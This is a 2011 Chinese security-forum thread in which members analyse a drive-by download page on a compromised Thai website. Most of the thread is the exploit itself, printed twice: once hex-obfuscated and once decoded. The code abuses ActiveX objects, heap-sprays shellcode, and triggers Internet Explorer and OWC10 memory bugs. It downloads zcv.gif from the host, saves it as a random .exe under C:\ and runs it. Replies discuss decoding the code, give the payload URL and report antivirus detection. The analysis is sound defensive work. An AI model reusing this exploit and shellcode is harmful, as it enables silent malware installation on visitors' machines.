hxxp://dop.rta.mi.th/Book/ebve.htm[挂马][已检测 by 是昔流芳]

显示全部楼层 · 发表于 2011-6-25 01:39:15

本帖最后由是昔流芳于 2011-6-25 07:27 编辑

誰會解這個？

看看會下載什麼.exe ？

http://dop.rta.mi.th/Book/ebve.htm

<html>
<body>
<script>
var Vg='a06d04937ccdc754e9ebc1c93e37da1309ac8e3c68746d6c3e0a3c626f64793e3c6469762069643d224469764944223e783c2f6469763e0a3c7363726970743e0a0a66756e6374696f6e20696e7365727455524c322875726c297b0a090976617220726573203d2022223b0a0909726573203d20646f63756d656e742e6c6f636174696f6e2e687265662e73756273747228302c646f63756d656e742e6c6f636174696f6e2e687265662e6c617374496e6465784f6628272f272929202b20222f22202b2075726c3b0a090972657475726e207265733b0a7d0a0a66756e6374696f6e20696e7365727455524c287368656c6c636f64652c20696f66667365742c2075726c297b0a090976617220726573203d2022223b0a09097661722072657375726c203d2022223b0a0909666f7228693d303b693c696f66667365742a333b692b3d33297b0a090909726573202b3d207368656c6c636f64652e73756273747228692c33293b0a09097d0a090975726c203d20646f63756d656e742e6c6f636174696f6e2e687265662e73756273747228302c646f63756d656e742e6c6f636174696f6e2e687265662e6c617374496e6465784f6628272f272929202b20222f22202b2075726c3b0a0909666f7228693d303b693c75726c2e6c656e6774683b692b3d32297b0a09092020766172206231203d2075726c2e73756273747228692c31292e63686172436f646541742830292e746f537472696e67283136293b0a090909766172206232203d2075726c2e73756273747228692b312c31292e63686172436f646541742830292e746f537472696e67283136293b0a09090972657375726c202b3d2022257522202b206232202b2062313b0a09097d0a0909726573202b3d2072657375726c3b0a0909666f7228693d696f66667365742a333b693c7368656c6c636f64652e6c656e6774683b692b3d33297b0a090909726573202b3d207368656c6c636f64652e73756273747228692c33293b0a09097d0a090972657475726e207265733b0a7d0a0a66756e6374696f6e2047657452616e64537472696e67286c656e290a7b0a09766172206368617273203d20226162636465666768696b6c6d6e6f707172737475767778797a223b0a0976617220737472696e675f6c656e677468203d206c656e3b0a097661722072616e646f6d737472696e67203d2027273b0a09666f72202876617220693d303b20693c737472696e675f6c656e6774683b20692b2b29207b0a090976617220726e756d203d204d6174682e666c6f6f72284d6174682e72616e646f6d2829202a2063686172732e6c656e677468293b0a090972616e646f6d737472696e67202b3d2063686172732e737562737472696e6728726e756d2c726e756d2b31293b0a097d0a0a0972657475726e2072616e646f6d737472696e673b0a7d0a0a66756e6374696f6e204372656174654f626a65637428434c5349442c206e616d6529207b0a097661722072203d206e756c6c3b0a09747279207b206576616c282772203d20434c5349442e4372656174654f626a656374286e616d65292729207d63617463682865297b7d090a0969662028217229207b20747279207b733d313b206576616c282772203d20434c5349442e4372656174654f626a656374286e616d652c202222292729207d63617463682865297b7d207d0a0969662028217229207b20747279207b733d313b206576616c282772203d20434c5349442e4372656174654f626a656374286e616d652c2022222c202222292729207d63617463682865297b7d207d0a0969662028217229207b20747279207b733d313b206576616c282772203d20434c5349442e4765744f626a6563742822222c206e616d65292729207d63617463682865297b7d207d0a0969662028217229207b20747279207b733d313b206576616c282772203d20434c5349442e4765744f626a656374286e616d652c202222292729207d63617463682865297b7d207d0a0969662028217229207b20747279207b733d313b206576616c282772203d20434c5349442e4765744f626a656374286e616d65292729207d63617463682865297b7d207d0a0972657475726e2872293b0a7d0a0a66756e6374696f6e20584d4c48747470446f776e6c6f616428786d6c2c2075726c29207b0a0a09747279207b0a0909786d6c2e6f70656e2822474554222c2075726c2c2066616c7365293b0a0909786d6c2e73656e64286e756c6c293b0a0a097d206361746368286529207b2072657475726e20303b207d0a0a0972657475726e20786d6c2e726573706f6e7365426f64793b0a7d0a0a66756e6374696f6e20414432424453747265616d53617665286f2c206e616d652c206461746129207b0a0a09747279207b0a09096f2e54797065203d20313b0a09096f2e4d6f6465203d20333b0a09096f2e4f70656e28293b0a09096f2e57726974652864617461293b0a09096f2e53617665546f46696c65286e616d652c2032293b0a09096f2e436c6f736528293b0a097d206361746368286529207b2072657475726e20303b207d0a0a0972657475726e20313b0a7d0a0a66756e6374696f6e205368656c6c4578656375746528657865632c206e616d652c207479706529207b0a0a096966202874797065203d3d203029207b0a0909747279207b20657865632e52756e286e616d652c2030293b2072657475726e20313b207d206361746368286529207b207d0a097d20656c7365207b0a0909747279207b206578652e5368656c6c45786563757465286e616d65293b2072657475726e20313b207d206361746368286529207b207d0a097d0a0a0972657475726e2830293b0a0a7d0a0a66756e6374696f6e204d4432432829207b0a097661722074203d206e657720417272617928277b424439364335272b2735362d363541332d3131272b2744302d393833412d30304330344643272b2732394533307d272c20277b4244393643272b273535362d363541332d3131272b2744302d393833412d30304330272b2734464332394533367d272c20277b41423942272b27434544442d454337452d3437272b2745312d393332322d4434413231272b27303631373131367d272c20277b3030303646272b273033332d303030302d303030302d433030302d303030303030272b273030303034367d272c20277b30303036272b27463033412d303030302d303030302d433030302d30303030303030272b2730303034367d272c20277b36653332272b27303730612d373636642d346565362d383739632d6463316661272b27393164326663337d272c20277b36343134272b27353132422d423937382d343531442d413044382d464346444633272b273345383333437d272c20277b37463542272b27374636332d463036462d343333312d384132362d333339453033272b274330414533447d272c20277b30363732272b27334530392d463443322d3433272b2763382d383335382d30394643443144272b2742303736367d272c20277b36333946272b27373235462d314232442d3438272b2733312d413946442d3837343834272b27373638323031307d272c20277b4241303138272b273539392d314442332d343466272b27392d383342342d3436313435272b27344338344246387d272c20277b4430433037272b274435362d374336392d343346312d4234272b2741302d323546354131272b273146414231397d272c20277b453843272b2743434444462d434132382d343936622d42272b273035302d3643303743393632272b27343736427d272c206e756c6c293b0a097661722076203d206e6577204172726179286e756c6c2c206e756c6c2c206e756c6c293b0a097661722069203d20303b0a09766172206e203d20303b0a0976617220726574203d20303b0a097661722075726c5265616c457865203d20696e7365727455524c3228277a63762e67696627293b0a097768696c652028745b695d20262620282120765b305d207c7c202120765b315d207c7c202120765b325d292029207b0a09097661722061203d206e756c6c3b0a0a0909747279207b0a09090961203d20646f63756d656e742e637265617465456c656d656e7428226f626a65637422293b0a090909612e7365744174747269627574652822636c6173736964222c2022636c7369643a22202b20745b695d2e737562737472696e6728312c20745b695d2e6c656e677468202d203129293b0a09097d206361746368286529207b2061203d206e756c6c3b207d0a09090a0909696620286129207b0a090909696620282120765b305d29207b0a09090909765b305d203d204372656174654f626a65637428612c20226d73786d6c322e584d4c4854545022293b0a09090909696620282120765b305d2920765b305d203d204372656174654f626a65637428612c20224d6963726f736f222b2266742e584d222b224c4854222b22545022293b0a09090909696620282120765b305d2920765b305d203d204372656174654f626a65637428612c20224d5358222b224d4c322e5365222b2272766572584d222b224c4854222b22545022293b0a0909097d0a0a090909696620282120765b315d29207b0a09090909765b315d203d204372656174654f626a65637428612c202241444f44222b22422e537472222b2265616d22293b0a0909097d0a0a090909696620282120765b325d29207b0a09090909765b325d203d204372656174654f626a65637428612c2022575363222b22726970742e5368222b22656c6c22293b0a09090909696620282120765b325d29207b0a0909090909765b325d203d204372656174654f626a65637428612c20225368656c222b226c2e4170222b22706c222b226963617469222b226f6e22293b0a090909090969662028765b325d29206e3d313b0a090909097d0a0909097d0a09097d0a0a0909692b2b3b0a097d0a0a0969662028765b305d20262620765b315d20262620765b325d29207b0a09097661722064617461203d20584d4c48747470446f776e6c6f616428765b305d2c2075726c5265616c457865293b0a0909696620286461746120213d203029207b0a090909766172206e616d65203d2022633a5c5c737973222b47657452616e64537472696e672834292b222e657865223b0a09090969662028414432424453747265616d5361766528765b315d2c206e616d652c206461746129203d3d203129207b0a09090909696620285368656c6c4578656375746528765b325d2c206e616d652c206e29203d3d203129207b0a09090909097265743d313b0a090909097d0a0909097d0a09097d0a097d0a0a0972657475726e207265743b0a7d0a0a76617220633d22257530306538257530303030257535643030257565643831257531313136257530303430257563303239257530333634257533303430257534303862257538623063257531633730257538626164257530383730257561633536257538623363257566623735257533653830257537353764257538336636257530336336257533646164257566666666257530303030257565623735257565653833257535623131257530636538257530303030257534373030257536663663257536313632257534313663257536633663257536333666257535333030257564366666257530303638257531303030257536613030257566663430257535306430257530646538257530303030257534633030257536313666257534633634257536323639257536313732257537393732257530303431257566663533257565386436257530303038257530303030257536393737257536393665257536353665257530303734257564306666257535303530257530656538257530303030257534393030257537343665257537323635257536353665257534663734257536353730257534313665257535303030257564366666257530303661257530303661257530303661257530313661257530636538257530303030257534643030257537613666257536633639257536313663257533343266257533303265257566663030257535616430257565383530257530303131257530303030257536653439257536353734257536653732257537343635257537303466257536653635257537323535257534313663257535323030257564366666257538643561257533353864257534303133257539303030257565383930257530313033257530303030257530303661257530303638257530303030257536613830257536613030257535313030257566663532257535396430257565383530257530303131257530303030257536653439257536353734257536653732257537343635257536353532257536343631257536393436257536353663257535313030257564366666257538643539257566663935257534303132257535663030257536383532257530303030257530303130257535313537257564306666257530646538257530303030257534373030257537343635257536353534257537303664257536313530257536383734257530303431257566663533257538646436257530333935257534303133257535323030257536613532257566663530257535616430257530346336257533313032257530636538257530303030257534333030257536353732257537343631257534363635257536633639257534313635257535333030257564366666257539353864257531333033257530303430257530303661257538303638257530303030257536613030257536613032257536613030257536383032257530303030257534303030257566663532257535306430257565383530257530303061257530303030257537323537257537343639257534363635257536633639257530303635257566663533257535616436257538623536257566663864257534303132257538643030257566626235257534303132257536613030257535363030257535373531257566663532257535656430257530636538257530303030257534333030257536663663257536353733257536313438257536343665257536353663257535333030257564366666257564306666257530386538257530303030257535373030257536653639257537383435257536333635257535333030257564366666257562643864257531333033257530303430257530313661257566663537257565386430257530303063257530303030257537383435257537343639257537323530257536333666257537333635257530303733257566663533257566666436257536306430257563653839257533636163257537353030257534656662257563363465257536363036257534366336257530303031257563333631257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030257530303030223b0a633d756e65736361706528696e7365727455524c28632c3534382c277a63762e6769662729293b0a766172206172726179203d206e657720417272617928293b200a0a766172206c73203d2030783130303030302d28632e6c656e6774682a322b30783031303230293b200a0a7661722062203d20756e657363617065282225753043304325753043304322293b200a7768696c6528622e6c656e6774683c6c732f3229207b20622b3d623b7d200a766172206c68203d20622e737562737472696e6728302c6c732f32293b200a64656c65746520623b200a0a666f7228693d303b20693c307843303b20692b2b29207b200a0961727261795b695d203d206c68202b20633b0a7d200a0a436f6c6c6563744761726261676528293b0a0a7661722073313d756e65736361706528222575306230622575306230624141414141414141414141414141414141414141414141414122293b0a766172206131203d206e657720417272617928293b0a666f722876617220783d303b783c313030303b782b2b292061312e7075736828646f63756d656e742e637265617465456c656d656e742822696d672229293b0a0a66756e6374696f6e20776f72645f28290a7b0a766172206172726179203d206e657720417272617928293b0a766172206c73203d20307838313030302d28632e6c656e6774682a32293b0a76617220626967626c6f636b203d20756e657363617065282225753062306325753062304322293b0a7768696c6528626967626c6f636b2e6c656e6774683c6c732f32290a7b0a626967626c6f636b2b3d626967626c6f636b3b0a7d0a766172206c68203d20626967626c6f636b2e737562737472696e6728302c6c732f32293b0a64656c65746520626967626c6f636b3b0a666f7228693d303b693c307839392a323b692b2b290a7b0a2061727261795b695d203d206c68202b206c68202b20633b200a7d0a436f6c6c6563744761726261676528293b0a766172206f626a203d206e657720416374697665584f626a65637428224f574331302e537072656164736865657422293b0a653d6e657720417272617928293b0a652e707573682831293b0a652e707573682832293b0a652e707573682830293b0a652e707573682877696e646f77293b0a666f7228693d303b693c652e6c656e6774683b692b2b290a7b0a20666f72286a3d303b6a3c31303b6a2b2b290a207b0a207472790a207b206f626a2e4576616c7561746528655b695d293b0a207d206361746368286529207b7d200a207d0a7d200a77696e646f772e7374617475733d655b335d202b27273b0a666f72286a3d303b6a3c31303b6a2b2b290a7b200a7472790a7b0a206f626a2e6d7344617461536f757263654f626a65637428655b335d293b200a7d206361746368286529207b7d200a7d200a7d0a0a0a66756e6374696f6e206f6b2829207b200a096f313d646f63756d656e742e637265617465456c656d656e74282274626f647922293b200a096f312e636c69636b3b200a09766172206f32203d206f312e636c6f6e654e6f646528293b090a096f312e636c6561724174747269627574657328293b200a096f313d6e756c6c3b20436f6c6c6563744761726261676528293b200a09666f722876617220783d303b783c61312e6c656e6774683b782b2b292061315b785d2e7372633d73313b200a096f322e636c69636b3b0a7d0a0a6966286e6176696761746f722e757365724167656e742e746f4c6f7765724361736528292e696e6465784f6628226d736965203722293d3d2d31290a7b0a094d44324328293b200a09536574496e74657276616c2822776f72645f2829222c34303030293b0a7d0a656c73650a7b0a096f6b28293b0a09536574496e74657276616c2822776f72645f2829222c34303030293b090a7d0920200a0a3c2f7363726970743e0a0a3c2f626f64793e0a3c2f68746d6c3e0d99c0c7267d36068edb428f6c3ee419042df740886f8d01db583d84';
var HJN = '';
var q = Vg.slice ( 38, 14236 );
for ( K = 38 ; K < 14236 ; K += 2 )
{
HJN += '%' + Vg.slice ( K, K + 2 );
}
document.write(unescape(HJN));
</script>
</body>
</html>

复制代码

显示全部楼层 · 发表于 2011-6-25 07:25:07

本帖最后由是昔流芳于 2011-6-25 07:26 编辑

zcv.gif是网马,很久以前就有这样的shellcode了.

<html>
<body><div id="DivID">x</div>
<script>
function insertURL2(url){
var res = "";
res = document.location.href.substr(0,document.location.href.lastIndexOf('/')) + "/" + url;
return res;
}

function insertURL(shellcode, ioffset, url){
var res = "";
var resurl = "";
for(i=0;i<ioffset*3;i+=3){
res += shellcode.substr(i,3);
}
url = document.location.href.substr(0,document.location.href.lastIndexOf('/')) + "/" + url;
for(i=0;i<url.length;i+=2){
var b1 = url.substr(i,1).charCodeAt(0).toString(16);
var b2 = url.substr(i+1,1).charCodeAt(0).toString(16);
resurl += "%u" + b2 + b1;
}
res += resurl;
for(i=ioffset*3;i<shellcode.length;i+=3){
res += shellcode.substr(i,3);
}
return res;
}

function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function AD2BDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MD2C() {
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = insertURL2('zcv.gif');
while (t && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t.substring(1, t.length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam");
}

if (! v[2]) {
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2]) {
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (AD2BDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

var c="%u00e8%u0000%u5d00%ued81%u1116%u0040%uc029%u0364%u3040%u408b%u8b0c%u1c70%u8bad%u0870%uac56%u8b3c%ufb75%u3e80%u757d%u83f6%u03c6%u3dad%uffff%u0000%ueb75%uee83%u5b11%u0ce8%u0000%u4700%u6f6c%u6162%u416c%u6c6c%u636f%u5300%ud6ff%u0068%u1000%u6a00%uff40%u50d0%u0de8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%uff53%ue8d6%u0008%u0000%u6977%u696e%u656e%u0074%ud0ff%u5050%u0ee8%u0000%u4900%u746e%u7265%u656e%u4f74%u6570%u416e%u5000%ud6ff%u006a%u006a%u006a%u016a%u0ce8%u0000%u4d00%u7a6f%u6c69%u616c%u342f%u302e%uff00%u5ad0%ue850%u0011%u0000%u6e49%u6574%u6e72%u7465%u704f%u6e65%u7255%u416c%u5200%ud6ff%u8d5a%u358d%u4013%u9000%ue890%u0103%u0000%u006a%u0068%u0000%u6a80%u6a00%u5100%uff52%u59d0%ue850%u0011%u0000%u6e49%u6574%u6e72%u7465%u6552%u6461%u6946%u656c%u5100%ud6ff%u8d59%uff95%u4012%u5f00%u6852%u0000%u0010%u5157%ud0ff%u0de8%u0000%u4700%u7465%u6554%u706d%u6150%u6874%u0041%uff53%u8dd6%u0395%u4013%u5200%u6a52%uff50%u5ad0%u04c6%u3102%u0ce8%u0000%u4300%u6572%u7461%u4665%u6c69%u4165%u5300%ud6ff%u958d%u1303%u0040%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6802%u0000%u4000%uff52%u50d0%ue850%u000a%u0000%u7257%u7469%u4665%u6c69%u0065%uff53%u5ad6%u8b56%uff8d%u4012%u8d00%ufbb5%u4012%u6a00%u5600%u5751%uff52%u5ed0%u0ce8%u0000%u4300%u6f6c%u6573%u6148%u646e%u656c%u5300%ud6ff%ud0ff%u08e8%u0000%u5700%u6e69%u7845%u6365%u5300%ud6ff%ubd8d%u1303%u0040%u016a%uff57%ue8d0%u000c%u0000%u7845%u7469%u7250%u636f%u7365%u0073%uff53%uffd6%u60d0%uce89%u3cac%u7500%u4efb%uc64e%u6606%u46c6%u0001%uc361%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000";
c=unescape(insertURL(c,548,'zcv.gif'));
var array = new Array();

var ls = 0x100000-(c.length*2+0x01020);

var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xC0; i++) {
array = lh + c;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function word_()
{
var array = new Array();
var ls = 0x81000-(c.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{
bigblock+=bigblock;
}
var lh = bigblock.substring(0,ls/2);
delete bigblock;
for(i=0;i<0x99*2;i++)
{
array = lh + lh + c;
}
CollectGarbage();
var obj = new ActiveXObject("OWC10.Spreadsheet");
e=new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for(i=0;i<e.length;i++)
{
for(j=0;j<10;j++)
{
try
{ obj.Evaluate(e);
} catch(e) {}
}
}
window.status=e[3] +'';
for(j=0;j<10;j++)
{
try
{
obj.msDataSourceObject(e[3]);
} catch(e) {}
}
}

function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
{
MD2C();
SetInterval("word_()",4000);
}
else
{
ok();
SetInterval("word_()",4000);
}

</script>

</body>
</html>

显示全部楼层 · 发表于 2011-6-25 08:48:41

卡巴2012拦截了

显示全部楼层 · 发表于 2011-6-25 10:40:13

是昔流芳发表于 2011-6-25 07:25
zcv.gif是网马,很久以前就有这样的shellcode了.

中間那一大段，%數字，要如何解碼？

显示全部楼层 · 发表于 2011-6-25 10:54:15

a256886572008 发表于 2011-6-25 10:40
中間那一大段，%數字，要如何解碼？

那段shellcode不是网马地址，有兴趣用od调
网马小芳已经说了，zcv.gif

显示全部楼层 · 发表于 2011-6-25 11:02:07

本帖最后由幸福的猪猪于 2011-6-25 11:08 编辑

Redoce的D>Document.Write清除(执行获得结果) 执行之后，即可得到解密代码。

p.s. 这个网马，以前在瑞星的“毒网分析”板块遇到过。（不知道是不是这个名称，好久没去过了）

var urlRealExe = insertURL2('zcv.gif');

显示全部楼层 · 发表于 2011-6-25 11:05:46

帅就是帅发表于 2011-6-25 10:54
那段shellcode不是网马地址，有兴趣用od调
网马小芳已经说了，zcv.gif

那個 .gif 的下載地址是什麼？

显示全部楼层 · 发表于 2011-6-25 11:09:02

本帖最后由幸福的猪猪于 2011-6-25 11:13 编辑

应该是: hxxp://dop.rta.mi.th/Book/zcv.gif

p.s. 相关下载链接失效？还是我获得的下载地址是错误的？

显示全部楼层 · 发表于 2011-6-25 11:20:25

幸福的猪猪发表于 2011-6-25 11:09
应该是: hxxp://dop.rta.mi.th/Book/zcv.gif

p.s. 相关下载链接失效？还是我获得的下载地址是错误的？

确实是失效了。

显示全部楼层 · 发表于 2011-6-25 12:46:08

趋势科技拦截

[其它] hxxp://dop.rta.mi.th/Book/ebve.htm[挂马][已检测 by 是昔流芳]

评分